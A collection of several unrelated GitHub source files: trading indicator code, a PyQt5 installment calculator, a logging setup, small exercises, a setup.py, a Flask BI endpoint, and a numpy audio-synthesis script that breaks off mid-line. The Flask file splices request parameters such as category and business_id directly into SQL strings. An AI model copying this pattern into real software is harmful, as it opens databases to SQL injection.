talib.MINUS_DM(high, low, timeperiod=period)\n df[prefix + \"MINUS_DM\"] = real\n\n if check_indicator(prefix + \"MOM\"):\n real = talib.MOM(close, timeperiod=period)\n df[prefix + \"MOM\"] = real\n\n if check_indicator(prefix + \"PLUS_DI\"):\n real = talib.PLUS_DI(high, low, close, timeperiod=period)\n df[prefix + \"PLUS_DI\"] = real\n\n if check_indicator(prefix + \"PLUS_DM\"):\n real = talib.PLUS_DM(high, low, timeperiod=period)\n df[prefix + \"PLUS_DM\"] = real\n\n if check_indicator(prefix + \"PPO\"):\n real = talib.PPO(close, fastperiod=period05, slowperiod=period, matype=0)\n df[prefix + \"PPO\"] = real\n\n if check_indicator(prefix + \"ROC\"):\n real = talib.ROC(close, timeperiod=period)\n df[prefix + \"ROC\"] = real\n\n if check_indicator(prefix + \"ROCP\"):\n real = talib.ROCP(close, timeperiod=period)\n df[prefix + \"ROCP\"] = real\n\n if check_indicator(prefix + \"ROCR\"):\n real = talib.ROCR(close, timeperiod=period)\n df[prefix + \"ROCR\"] = real\n\n if check_indicator(prefix + \"ROCR100\"):\n real = talib.ROCR100(close, timeperiod=period)\n df[prefix + \"ROCR100\"] = real\n\n if check_indicator(prefix + \"RSI\"):\n real = talib.RSI(close, timeperiod=period)\n df[prefix + \"RSI\"] = real\n\n if check_indicator(prefix + \"TRIX\"):\n real = talib.TRIX(close, timeperiod=period)\n df[prefix + \"TRIX\"] = real\n\n if check_indicator(prefix + \"ULTOSC\"):\n real = talib.ULTOSC(high, low, close, timeperiod1=period05, timeperiod2=period07, timeperiod3=period)\n df[prefix + \"ULTOSC\"] = real\n\n if check_indicator(prefix + \"WILLR\"):\n real = talib.WILLR(high, low, close, timeperiod=period)\n df[prefix + \"WILLR\"] = real\n\n if check_indicator(prefix + \"aroon\"):\n aroondown, aroonup = talib.AROON(high, low, timeperiod=period)\n df[prefix + \"aroondown\"] = aroondown\n df[prefix + \"aroonup\"] = aroonup\n\n if check_indicator(prefix + \"macd\"):\n macd, macdsignal, macdhist = talib.MACD(close, fastperiod=period05, slowperiod=period, signalperiod=period07)\n df[prefix + \"macd\"] = macd\n df[prefix + \"macdsignal\"] = macdsignal\n df[prefix + \"macdhist\"] = macdhist\n\n # macd, macdsignal, macdhist = talib.MACDEXT(close, fastperiod=period05, fastmatype=0, slowperiod=period, slowmatype=0, signalperiod=period07, signalmatype=0)\n # df[prefix + \"macd2\"] = macd\n # df[prefix + \"macdsignal2\"] = macdsignal\n # df[prefix + \"macdhist2\"] = macdhist\n\n # macd, macdsignal, macdhist = talib.MACDFIX(close, signalperiod=period)\n # df[prefix + \"macd3\"] = macd\n # df[prefix + \"macdsignal3\"] = macdsignal\n # df[prefix + \"macdhist3\"] = macdhist\n\n if check_indicator(prefix + \"slow\"):\n slowk, slowd = talib.STOCH(high, low, close, fastk_period=period05, slowk_period=period, slowk_matype=0, slowd_period=period, slowd_matype=0)\n df[prefix + \"slowk\"] = slowk\n df[prefix + \"slowd\"] = slowd\n\n if check_indicator(prefix + \"fast\"):\n fastk, fastd = talib.STOCHF(high, low, close, fastk_period=period05, fastd_period=period, fastd_matype=0)\n df[prefix + \"fastk\"] = fastk\n df[prefix + \"fastd\"] = fastd\n\n if check_indicator(prefix + \"fast\"):\n fastk, fastd = talib.STOCHRSI(close, timeperiod=period, fastk_period=period05, fastd_period=period03, fastd_matype=0)\n df[prefix + \"fastk2\"] = fastk\n df[prefix + \"fastd2\"] = fastd\n\n # __ _____ _ _ _ __ __ _____\n # \\ \\ / / _ \\| | | | | | \\/ | ____|\n # \\ \\ / / | | | | | | | | |\\/| | _|\n # \\ V /| |_| | |__| |_| | | | | |___\n # \\_/ \\___/|_____\\___/|_| |_|_____|\n if check_indicator(prefix + \"ADOSC\"): \n real = talib.ADOSC(high, low, close, volume, fastperiod=period03, slowperiod=period)\n df[prefix + \"ADOSC\"] = real\n\n # __ _____ _ _ _____ ___ _ ___ _______ __\n # \\ \\ / / _ \\| | / \\|_ _|_ _| | |_ _|_ _\\ \\ / /\n # \\ \\ / / | | | | / _ \\ | | | || | | | | | \\ V /\n # \\ V /| |_| | |___ / ___ \\| | | || |___ | | | | | |\n # \\_/ \\___/|_____/_/ \\_\\_| |___|_____|___| |_| |_|\n if check_indicator(prefix + \"ATR\"): \n real = talib.ATR(high, low, close, timeperiod=period)\n df[prefix + \"ATR\"] = real\n\n if check_indicator(prefix + \"NATR\"):\n real = talib.NATR(high, low, close, timeperiod=period)\n df[prefix + \"NATR\"] = real\n\n # ____ _____ _ _____ ___ ____ _____ ___ ____ ____\n # / ___|_ _|/ \\|_ _|_ _/ ___|_ _|_ _/ ___/ ___|\n # \\___ \\ | | / _ \\ | | | |\\___ \\ | | | | | \\___ \\\n # ___) || |/ ___ \\| | | | ___) || | | | |___ ___) |\n # |____/ |_/_/ \\_\\_| |___|____/ |_| |___\\____|____/\n if check_indicator(prefix + \"BETA\"): \n real = talib.BETA(high, low, timeperiod=period)\n df[prefix + \"BETA\"] = real\n\n if check_indicator(prefix + \"CORREL\"):\n real = talib.CORREL(high, low, timeperiod=period)\n df[prefix + \"CORREL\"] = real\n\n if check_indicator(prefix + \"LINEARREG\"):\n real = talib.LINEARREG(close, timeperiod=period)\n df[prefix + \"LINEARREG\"] = real\n\n if check_indicator(prefix + \"LINEARREG_ANGLE\"):\n real = talib.LINEARREG_ANGLE(close, timeperiod=period)\n df[prefix + \"LINEARREG_ANGLE\"] = real\n\n if check_indicator(prefix + \"LINEARREG_INTERCEPT\"):\n real = talib.LINEARREG_INTERCEPT(close, timeperiod=period)\n df[prefix + \"LINEARREG_INTERCEPT\"] = real\n\n if check_indicator(prefix + \"LINEARREG_SLOPE\"):\n real = talib.LINEARREG_SLOPE(close, timeperiod=period)\n df[prefix + \"LINEARREG_SLOPE\"] = real\n\n if check_indicator(prefix + \"STDDEV\"):\n real = talib.STDDEV(close, timeperiod=period, nbdev=1)\n df[prefix + \"STDDEV\"] = real\n\n if check_indicator(prefix + \"TSF\"):\n real = talib.TSF(close, timeperiod=period)\n df[prefix + \"TSF\"] = real\n\n if check_indicator(prefix + \"VAR\"):\n real = talib.VAR(close, timeperiod=period, nbdev=1)\n df[prefix + \"VAR\"] = real\n\n # _____ ___ _ _ _____ _\n # | ___|_ _| \\ | |_ _|/ \\\n # | |_ | || \\| | | | / _ \\\n # | _| | || |\\ | | |/ ___ \\\n # |_| |___|_| \\_| |_/_/ \\_\\\n set_cols()\n #if check_indicator_add(\"VWAP\", prefix):\n # real = fin_custom.VWAP(df, period=period)\n # add(\"VWAP\", real, prefix)\n #\n #if check_indicator_add(\"CFI\", prefix):\n # real = fin_custom.CFI(df, period=period)\n # add(\"CFI\", real, prefix)\n #\n #if check_indicator_add(\"VPT\", prefix):\n # real = fin_custom.VPT(df, period=period)\n # add(\"VPT\", real, prefix)\n #\n #if check_indicator_add(\"ADL\", prefix):\n # tmp = fin_custom.ADL(df, period=period)\n # add(\"ADL\", tmp, prefix)\n #\n #if check_indicator_add(\"OBV\", prefix):\n # tmp = fin_custom.OBV(df, period=period)\n # add(\"OBV\", tmp, prefix)\n \n if check_indicator_add(\"WMA\", prefix):\n real = fin.WMA(df, period=period)\n add(\"WMA\", real, prefix)\n \n if check_indicator_add(\"HMA\", prefix):\n real = fin.HMA(df, period=period)\n add(\"HMA\", real, prefix)\n \n if check_indicator_add(\"PPO\", prefix):\n real = fin.PPO(df, period_fast=period05, period_slow=period, signal=period03)\n add(\"PPO\", real, prefix)\n \n if check_indicator_add(\"EVWMA\", prefix):\n #real = fin.EVWMA(df, period=period)\n #add(\"EVWMA\", real, prefix)\n pass\n \n if check_indicator_add(\"IFT_RSI\", prefix):\n real = fin.IFT_RSI(df, rsi_period=period05, wma_period=period)\n add(\"IFT_RSI\", real, prefix)\n \n if check_indicator_add(\"FVE\", prefix):\n real = fin.FVE(df, period=period)\n add(\"FVE\", real, prefix)\n \n if check_indicator_add(\"VFI\", prefix):\n real = fin.VFI(df, period=period)\n add(\"VFI\", real, prefix)\n \n if check_indicator_add(\"STC\", prefix):\n #real = fin.STC(df, period_fast=period05, period_slow=period, period=period02)\n #add(\"STC\", real, prefix)\n pass\n \n if check_indicator_add(\"AO\", prefix):\n real = fin.AO(df, slow_period=period * 2, fast_period=period05)\n add(\"AO\", real, prefix)\n \n if check_indicator_add(\"MI\", prefix):\n real = fin.MI(df, period=period)\n add(\"MI\", real, prefix)\n \n if check_indicator_add(\"VORTEX\", prefix):\n real = fin.VORTEX(df, period=period)\n add(\"VORTEX\", real, prefix)\n \n if check_indicator_add(\"VZO\", prefix):\n real = fin.VZO(df, period=period)\n add(\"VZO\", real, prefix)\n \n if check_indicator_add(\"PZO\", prefix):\n real = fin.PZO(df, period=period)\n add(\"PZO\", real, prefix)\n \n if check_indicator_add(\"EFI\", prefix):\n real = fin.EFI(df, period=period)\n add(\"EFI\", real, prefix)\n \n if check_indicator_add(\"EMV\", prefix):\n real = fin.EMV(df, period=period)\n add(\"EMV\", real, prefix)\n \n if check_indicator_add(\"CCI\", prefix):\n real = fin.CCI(df, period=period)\n add(\"CCI\", real, prefix)\n \n if check_indicator_add(\"BASP\", prefix):\n real = fin.BASP(df, period=period)\n add(\"BASP\", real, prefix)\n \n if check_indicator_add(\"WTO\", prefix):\n real = fin.WTO(df, channel_lenght=period05, average_lenght=period)\n add(\"WTO\", real, prefix)\n \n if check_indicator_add(\"FISH\", prefix):\n real = fin.FISH(df, period=period)\n add(\"FISH\", real, prefix)\n \n if check_indicator_add(\"TSI\", prefix):\n tmp = fin.TSI(df, long=period, short=period05, signal=period05)\n add(\"TSI\", tmp, prefix)\n \n if check_indicator_add(\"MFI\", prefix):\n tmp = fin.MFI(df, period=period)\n add(\"MFI\", tmp, prefix)\n \n if check_indicator_add(\"ICHIMOKU\", prefix):\n tmp = fin.ICHIMOKU(df, tenkan_period=period02, kijun_period=period05, senkou_period=period, chikou_period=period05, )\n add(\"ICHIMOKU\", tmp, prefix)\n \n if check_indicator_add(\"APZ\", prefix):\n tmp = fin.APZ(df, period=period)\n add(\"APZ\", tmp, prefix)\n \n if check_indicator_add(\"SQZMI\", prefix):\n tmp = fin.SQZMI(df, period=period)\n add(\"SQZMI\", tmp, prefix)\n \n if check_indicator_add(\"KC\", prefix):\n tmp = fin.KC(df, period=period, atr_period=period05)\n add(\"KC\", tmp, prefix)\n \n if check_indicator_add(\"DO\", prefix):\n tmp = fin.DO(df, upper_period=period, lower_period=period03)\n add(\"DO\", tmp, prefix)\n \n if check_indicator_add(\"DMI\", prefix):\n tmp = fin.DMI(df, period=period)\n add(\"DMI\", tmp, prefix)\n\n # ____ _ _ ____ _____ ___ __ __\n # / ___| | | / ___|_ _/ _ \\| \\/ |\n # | | | | | \\___ \\ | || | | | |\\/| |\n # | |___| |_| |___) || || |_| | | | |\n # \\____|\\___/|____/ |_| \\___/|_| |_|\n #if check_indicator_add(\"consolidation_zones\", prefix):\n # #tmp = cust.consolidation_zones(df, period, period05)\n # #add(\"consolidation_zones\", tmp, prefix)\n # pass\n #\n #if check_indicator_add(\"trendflex\", prefix):\n # tmp = cust.trendflex(df, period, source=\"close\")\n # add(\"trendflex\", tmp, prefix)\n #\n #if check_indicator_add(\"mesa_mama\", prefix):\n # tmp = cust.mesa_mama(df, fastLimit=0.25, slowLimit=0.05, warmUpPeriod=period)\n # add(\"mesa_mama\", tmp, prefix)\n #\n #if check_indicator_add(\"hurst_cycle\", prefix):\n # tmp = cust.hurst_cycle(df, scl_t=period03, mcl_t=period, scm=1, mcm=3, prefix=\"\")\n # add(\"hurst_cycle\", tmp, prefix)\n #\n #if check_indicator_add(\"compute_Hc\", prefix):\n # tmp = cust.compute_Hc(close, kind=\"random_walk\", min_window=period, max_window=None, simplified=True)\n # add(\"compute_Hc\", tmp, prefix)\n #\n #if check_indicator_add(\"fractal_dimension_index\", prefix):\n # tmp = cust.fractal_dimension_index(df, period)\n # add(\"fractal_dimension_index\", tmp, prefix)\n #\n #if check_indicator_add(\"donchian_channel\", prefix):\n # tmp = cust.donchian_channel(df, period, _min_periods=None, _fillna=True, _offset=0)\n # add(\"donchian_channel\", tmp, prefix)\n #\n #if check_indicator_add(\"fractal_sr\", prefix):\n # tmp = cust.fractal_sr(df, period)\n # add(\"fractal_sr\", tmp, prefix)\n #\n #if check_indicator_add(\"wavepm\", prefix):\n # tmp = cust.wave_pm(close, window=period)\n # add(\"wavepm\", tmp, prefix)\n #\n #if check_indicator_add(\"adr\", prefix):\n # tmp = cust.adr(df)\n # add(\"adr\", tmp, prefix)\n\n return df\n","repo_name":"flamingrickpat/genopt","sub_path":"indicator_util.py","file_name":"indicator_util.py","file_ext":"py","file_size_in_byte":40328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7755056122","text":"# phone.py\r\n\r\nimport sys\r\nfrom PyQt5.QtWidgets import (QApplication, QWidget, QLabel, QTextEdit,\r\n\tQPushButton, QButtonGroup, QCheckBox, QLineEdit, QMessageBox, QDoubleSpinBox,\r\n\tQComboBox, QSpinBox, QHBoxLayout, QVBoxLayout, QGridLayout, QFormLayout)\r\nfrom PyQt5.QtGui import QPixmap, QFont\r\nfrom PyQt5.QtCore import QCoreApplication, Qt\r\n\r\n# QLineEdit : 1줄만 입력 가능\r\n# QTextEdit : 여러줄 입력 가능\r\n\r\nclass AppForm(QWidget):\r\n\tdef __init__(self):\r\n\t\tsuper().__init__() # QWidget의 기본 생성자 부름\r\n\t\tself.initializeUI()\r\n\r\n\tdef initializeUI(self):\r\n\t\t\"\"\"\r\n\t\t윈도우 화면에 출력되는 컨텐츠 초기화\r\n\t\t\"\"\"\r\n\t\tself.setGeometry(100, 100, 600, 400) # 창 위치 지정\r\n\t\tself.setWindowTitle(\"Todo List\") # 창 캡션\r\n\t\tself.phoneWidgets()\r\n\t\tself.show() \r\n\r\n\tdef phoneWidgets(self):\r\n\t\ttitle = QLabel(\"휴대폰 월 할부금 구하기\")\r\n\t\ttitle.setFont(QFont(\"Arial\", 24))\r\n\t\ttitle.setAlignment(Qt.AlignCenter)\r\n\r\n\t\tpay_money_title = QLabel(\"할부원금 : \")\r\n\t\tpay_money_title.setFont(QFont(\"Ariel\", 16))\r\n\t\tpay_money_title.setAlignment(Qt.AlignLeft)\r\n\t\tself.pay_money = QLineEdit(self)\r\n\t\tself.pay_money.setPlaceholderText(\"원\")\r\n\r\n\t\tpay_month_title = QLabel(\"할부개월수 : \")\r\n\t\tpay_month_title.setFont(QFont(\"Ariel\", 16))\r\n\t\tpay_month_title.setAlignment(Qt.AlignLeft)\r\n\t\tself.pay_month = QLineEdit(self)\r\n\t\tself.pay_month.setPlaceholderText(\"개월\")\r\n\r\n\t\tpay_rate_title = QLabel(\"할부수수료(년이율 %) : \")\r\n\t\tpay_rate_title.setFont(QFont(\"Ariel\", 16))\r\n\t\tpay_rate_title.setAlignment(Qt.AlignLeft)\r\n\t\tself.pay_rate = QDoubleSpinBox(self)\r\n\r\n\t\tcal_button = QPushButton(\"계산\")\r\n\t\tcal_button.clicked.connect(self.CalculateMoney)\r\n\t\tcal_button.setFont(QFont(\"Ariel\", 18))\r\n\r\n\t\tself.result = QLabel(\"월 할부금 : \", self)\r\n\t\tself.result.setFont(QFont(\"Ariel\", 20))\r\n\t\tself.result.setAlignment(Qt.AlignCenter)\r\n\r\n\t\tform = QFormLayout()\r\n\t\tform.addRow(title)\r\n\t\tform.addRow(pay_money_title, self.pay_money)\r\n\t\tform.addRow(pay_month_title, self.pay_month)\r\n\t\tform.addRow(pay_rate_title, self.pay_rate)\r\n\t\tform.addRow(cal_button)\r\n\t\tform.addRow(self.result)\r\n\r\n\t\tself.setLayout(form)\r\n\r\n\r\n\tdef CalculateMoney(self):\r\n\t\tp = int(self.pay_money.text())\r\n\t\tn = int(self.pay_month.text()) \r\n\t\tr = float(self.pay_rate.value()) / 1200 \r\n\t\tresult_cal = int(p * ((r * (pow((1 + r), n)) / (pow((1 + r), n) - 1) )))\r\n\t\tself.result.setText(f\"월 할부금 : {result_cal} 원\")\r\n\r\n# 프로그램 실행\r\nif __name__ == '__main__':\r\n\tapp = QApplication(sys.argv) # sys.argv\r\n\t# print(sys.argv)\r\n\twindow = AppForm()\r\n\tsys.exit(app.exec_())\r\n","repo_name":"splendorsu/pyqt5-2022","sub_path":"phone.py","file_name":"phone.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73037590887","text":"import logging.config\nfrom logging import NullHandler\nfrom os.path import expanduser, join, dirname\nfrom os import makedirs\n\nlogging.getLogger(__name__).addHandler(NullHandler())\nLOG_PATH = expanduser(join('~', '.studdp', 'studdp.log'))\nmakedirs(dirname(LOG_PATH), exist_ok=True)\n\nlogging.config.dictConfig({\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'standard': {\n 'format': '%(asctime)s [%(levelname)s] %(name)s: %(message)s'\n },\n 'minimal': {\n 'format': '[%(levelname)s]: %(message)s'\n }\n },\n 'handlers': {\n 'default': {\n 'level': 'INFO',\n 'class': 'logging.StreamHandler',\n 'formatter': 'minimal'\n },\n 'file_handler': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'formatter': 'standard',\n 'filename': LOG_PATH\n }\n },\n 'loggers': {\n '': {\n 'handlers': ['default', 'file_handler'],\n 'level': 'DEBUG',\n 'propagate': True\n }\n }\n})\n\nlogging.info(\"Logging initialized\")\n","repo_name":"CogSciUOS/StudDP","sub_path":"studdp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72546386407","text":"#nhập một chuỗi tối đa 10 kí tự và in chuỗi\n#in ra màn hình: chiều dài chuỗi, số khoảng trắng\n#chuyển chuỗi sang chữ in HOA và in chuỗi\n\na=11\nwhile a>10:\n\tx = input(\"Nhập chuỗi tối đa 10 kí tự:\") #input\n\ta= len(x)\n\n\nb=0 #biến đếm khoảng trắng\n\nfor i in range(0,a):\n\tif x[i]==\" \":\n\t\tb+=1\n#ouput\t\t\nprint(\"Chuỗi sau khi in HOA: \",x.upper())\nprint(\"Số khoảng trắng: \", b)\nprint(\"Chiều dài chuỗi: \", a)","repo_name":"Chi68P1/Lap_trinh_python","sub_path":"BT/BT7.py","file_name":"BT7.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3413522618","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='lightwave',\n version='0.24',\n description='Python library to provide a reliable communication link with LightWaveRF lights, switches and TRVs.',\n url='https://github.com/GeoffAtHome/lightwave',\n author='Geoff Soord',\n author_email='geoff@soord.org.uk',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n license='MIT',\n packages=setuptools.find_packages(),\n keywords=['Lightwave', 'LightwaveRF',\n 'Lightwave WiFiLink', 'Lightwave Link'],\n zip_safe=False\n)\n","repo_name":"GeoffAtHome/lightwave","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5628153917","text":"# -*- coding: utf-8 -*-\n# @Author : Joshua\n# @File : product_big_style_info\n\nfrom flask import jsonify, request\nfrom bi_flask.__token import __token_wrapper\nimport logging\nimport json\nfrom bi_flask._sessions import sessions, sessions_scopes\nfrom bi_flask.utils import *\nfrom bi_flask.goods.api import good\n\nlogger = logging.getLogger('bi')\nScope = sessions_scopes(sessions)\n\n\n@good.route('/get_category_class_big_style_info', methods=['GET'], endpoint='get_category_class_big_style_info')\n@__token_wrapper\ndef get_category_class_big_style_info(context):\n '''\n 获取年度品类企划\n :param context:\n :return:\n '''\n try:\n business_id = request.args.get('business_id')\n doc_year = request.args.get('year')\n filter = request.args.get('filter')\n if filter is None or filter == '':\n context['data'] = []\n context['total'] = {'spring': 0, 'summer': 0, 'autumn': 0, 'winter': 0}\n return jsonify(context)\n if 'OEM' in filter and 'ODM' in filter:\n oem_sql = \"\"\" \"\"\"\n elif 'OEM' in filter:\n oem_sql = \"\"\" and d.is_ODM=0 \"\"\"\n elif 'ODM' in filter:\n oem_sql = \"\"\" and d.is_ODM=1 \"\"\"\n else:\n oem_sql = \"\"\" \"\"\"\n if '延续款' in filter:\n if 'OEM' in filter or 'ODM' in filter:\n product_sql = \"\"\" \"\"\"\n else:\n product_sql = \"\"\" and d.tag='延续款' \"\"\"\n else:\n product_sql = \"\"\" and d.tag<>'延续款' \"\"\"\n\n sql = f\"\"\"\n SELECT a.doc_season,a.big_category,a.category,a.product_dev_plan,ifnull(b.product_count,0) as product_count from(\n SELECT doc_season ,m.big_category,d.category,sum(d.plan_nums ) as product_dev_plan\n FROM bi_big_category_plan d \n left join hmcdata.big_style_mapper m on d.category =m.category \n left join bi_business_brand_new n on d.category_class=n.CategoryClass and d.is_online=n.is_online\n where d.doc_year=:doc_year and n.business_id=:business_id\n GROUP BY doc_season ,m.big_category,d.category\n )a left join(\n SELECT ifnull(category,'其他') as category ,count(DISTINCT product_sn) as product_count,doc_season \n FROM hmcdata.bi_product_season_plan_category_detail d\n left join bi_business_brand_new n on d.category_class=n.CategoryClass and d.is_online=n.is_online\n where doc_year=:doc_year and n.business_id=:business_id {oem_sql} {product_sql} -- and product_style is not null\n GROUP by category,doc_season\n )b on a.doc_season=b.doc_season and a.category=b.category\n union\n SELECT b.doc_season,ifnull(b.big_category,'其他') as big_category,b.category,ifnull(a.product_dev_plan,0) as product_dev_plan,ifnull(b.product_count,0) as product_count from(\n SELECT doc_season ,d.category,sum(d.plan_nums ) as product_dev_plan\n FROM hmcdata.bi_big_category_plan d \n left join bi_business_brand_new n on d.category_class=n.CategoryClass and d.is_online=n.is_online\n where d.doc_year=:doc_year and n.business_id=:business_id \n GROUP BY doc_season ,d.category\n )a right join(\n SELECT m.big_category,ifnull(d.category,'其他') as category ,count(DISTINCT product_sn) as product_count,doc_season \n FROM hmcdata.bi_product_season_plan_category_detail d\n left join bi_business_brand_new n on d.category_class=n.CategoryClass and d.is_online=n.is_online\n left join hmcdata.big_style_mapper m on d.category =m.category \n where doc_year=:doc_year and n.business_id=:business_id {oem_sql} {product_sql} -- and product_style is not null\n GROUP by d.category,doc_season,m.big_category\n )b on a.doc_season=b.doc_season and a.category=b.category\n \"\"\"\n ret = Scope['bi_saas'].execute(sql, {'doc_year': doc_year, 'business_id': business_id})\n columns = ret.keys()\n data = []\n for rank, val in enumerate(ret):\n data_dict = {}\n for i, column in enumerate(columns):\n if isinstance(val[i], decimal.Decimal):\n data_dict[column] = format_4(val[i])\n elif isinstance(val[i], datetime.datetime):\n data_dict[column] = datetime_format(val[i])\n elif isinstance(val[i], float):\n data_dict[column] = format_4(val[i])\n elif isinstance(val[i], datetime.date):\n data_dict[column] = date_format(val[i])\n elif val[i] is None:\n data_dict[column] = 0\n else:\n data_dict[column] = val[i]\n data.append(data_dict)\n hash_dict = {}\n total_obj = {'spring': 0, 'summer': 0, 'autumn': 0, 'winter': 0}\n for val in data:\n if val['big_category'] in hash_dict:\n hash_dict[val['big_category']].append(val)\n else:\n hash_dict[val['big_category']] = []\n hash_dict[val['big_category']].append(val)\n\n if val['doc_season'] == '春季':\n total_obj['spring'] += val['product_count']\n elif val['doc_season'] == '夏季':\n total_obj['summer'] += val['product_count']\n elif val['doc_season'] == '秋季':\n total_obj['autumn'] += val['product_count']\n elif val['doc_season'] == '冬季':\n total_obj['winter'] += val['product_count']\n\n context['data'] = hash_dict\n context['total'] = total_obj\n\n return jsonify(context)\n finally:\n Scope['bi_saas'].remove()\n\n\n@good.route('/get_category_big_style_detail', methods=['GET'], endpoint='get_category_big_style_detail')\n@__token_wrapper\ndef get_category_big_style_detail(context):\n '''\n 获取年度风格线企划明细\n :param context:\n :return:\n '''\n try:\n business_id = request.args.get('business_id')\n doc_year = request.args.get('year')\n category = request.args.get('category')\n big_category = request.args.get('big_category')\n season = request.args.get('season')\n filter = request.args.get('filter')\n if category is not None and category != \"其他\":\n product_style_sql = f\"\"\" and d.category='{category}' \"\"\"\n # elif category == \"其他\":\n # product_style_sql = f\"\"\" and d.category is null \"\"\"\n else:\n product_style_sql = \"\"\n if big_category is not None and big_category != \"其他\":\n big_style_sql = f\"\"\" and m.big_category='{big_category}' \"\"\"\n # elif big_category == \"其他\":\n # big_style_sql = f\"\"\" and d.big_style is null \"\"\"\n else:\n big_style_sql = \"\"\n if filter is None or filter == '':\n context['data'] = []\n return jsonify(context)\n if 'OEM' in filter and 'ODM' in filter:\n oem_sql = \"\"\" \"\"\"\n elif 'OEM' in filter:\n oem_sql = \"\"\" and d.is_ODM=0 \"\"\"\n elif 'ODM' in filter:\n oem_sql = \"\"\" and d.is_ODM=1 \"\"\"\n else:\n oem_sql = \"\"\" \"\"\"\n if '延续款' in filter:\n if 'OEM' in filter or 'ODM' in filter:\n product_sql = \"\"\" \"\"\"\n else:\n product_sql = \"\"\" and d.tag='延续款' \"\"\"\n else:\n product_sql = \"\"\" and d.tag<>'延续款' \"\"\"\n\n sql = f\"\"\"\n select a.*,i.img_src from (\n SELECT doc_season,product_sn,sum(stock_nums+production_onway_nums) as total_stock,sum(planorder_nums) as planorder_nums,fixed_price,\n ifnull(d.category,'未知') as category,ifnull(big_category,'未知') as big_category FROM hmcdata.bi_product_season_plan_category_detail d\n left join hmcdata.big_style_mapper m on d.category =m.category \n where doc_year=:doc_year and doc_season=:doc_season {product_style_sql} {big_style_sql} {oem_sql} {product_sql} and exists (\n select 1 from bi_business_brand_new n where n.business_id={business_id} and d.category_class=n.CategoryClass and d.is_online=n.is_online \n ) and product_style is not null\n group by product_sn,fixed_price,category,doc_season,big_category\n )a left join bi_product_img i on a.product_sn=i.product_sn\n \"\"\"\n ret = Scope['bi_saas'].execute(sql, {'doc_year': doc_year, 'business_id': business_id, 'doc_season': season})\n columns = ret.keys()\n data = []\n for rank, val in enumerate(ret):\n data_dict = {}\n for i, column in enumerate(columns):\n if isinstance(val[i], decimal.Decimal):\n data_dict[column] = format_4(val[i])\n elif isinstance(val[i], datetime.datetime):\n data_dict[column] = datetime_format(val[i])\n elif isinstance(val[i], float):\n data_dict[column] = format_4(val[i])\n elif isinstance(val[i], datetime.date):\n data_dict[column] = date_format(val[i])\n elif val[i] is None:\n data_dict[column] = 0\n else:\n data_dict[column] = val[i]\n data.append(data_dict)\n context['data'] = data\n\n return jsonify(context)\n finally:\n Scope['bi_saas'].remove()\n","repo_name":"adon-li/BI_flask","sub_path":"goods/product_big_style_info.py","file_name":"product_big_style_info.py","file_ext":"py","file_size_in_byte":9675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"24674642364","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport sounddevice as sd\r\nfrom scipy.fftpack import fft\r\n\r\n#setting the total song duration to 3 seconds\r\nk=np.linspace(0,3,12*1024)\r\n\r\n#creating an array for left and right hand frequencies , pressing start time and total pressing time for every note in the song\r\nleft=[0,246.93,0,220,196] #the right hand frequencies of 4th octave\r\nright=[261.63,0,261.63,0,0] #the left hand frequencies of 3rd octave\r\nTi=[0,0.9,1.4,1.9,2.3] #pressing start time (0<=Ti<3)\r\nTf=[0.9,0.5,0.5,0.4,0.7] #Total pressing time\r\n\r\ndef music(k,right,left,Ti,Tf):\r\n f=np.zeros(np.shape(k)) #an array of zeros of length k\r\n # loop for traversing the arrays and resulting at the end the value of x(t) (summation of N pair of notes)\r\n for i in range(len(right)):\r\n #for each i, the values of f1,F1,ti,Ti will be substituted in the single tone generation formula\r\n f+=((np.sin(2*np.pi*left[i]*k))+(np.sin(2*np.pi*right[i]*k)))*((k>Ti[i])*(k<(Ti[i]+Tf[i])))\r\n return f\r\no=music(k,right,left,Ti,Tf)\r\nsd.play(o, 3*1024) \r\n \r\nN= 3*1024\r\nf= np.linspace(0,512,int(N/2))\r\nxf=fft(o)\r\nxf = (2/N)*np.abs(xf[0:np.int(N/2)])\r\n\r\nf_n1,f_n2=np.random.randint(0,512,2)\r\nrandomnoise=np.sin(2*np.pi*f_n1*k)+np.sin(2*np.pi*f_n2*k)\r\n\r\n#add the noise to sound \r\nadd=randomnoise+o\r\naddFun=fft(add)\r\n\r\n#abs to remove complex part\r\naddF=2/N * np.abs(addFun[0:np.int(N/2)])\r\n\r\n#sort the arrays to get the highes 2 frequencies\r\nsortAdd=np.sort(addF)\r\n\r\n#Search for the two peeks > max peek in original and remove them\r\n#search for them and restore their places -1,-2 predifined\r\naddFn1=sortAdd[-1]\r\naddFn2=sortAdd[-2]\r\n#remove max from time domain instead of freq by transforming it inversely \r\n\r\n#FREQ DOMAIN to see peeks, differentiate between signal and noise (x(t))\r\n#noises that are less than max peek cannot be removed as you couldn't find them\r\n#u(t) decides the interval\r\n \r\n#Get their place in freq domain (random+noise)\r\nplace1=np.where(addF==addFn1)\r\nplace2=np.where(addF==addFn2)\r\n\r\nf1=round(f[place1[0][0]])\r\nf2=round(f[place2[0][0]])\r\n\r\n#remove noises that i rounded them\r\nfilterS=add-(np.sin(2*np.pi*f_n1*k)+np.sin(2*np.pi*f_n2*k))\r\nfilterSF=fft(filterS)\r\nfilterSF=2/N * 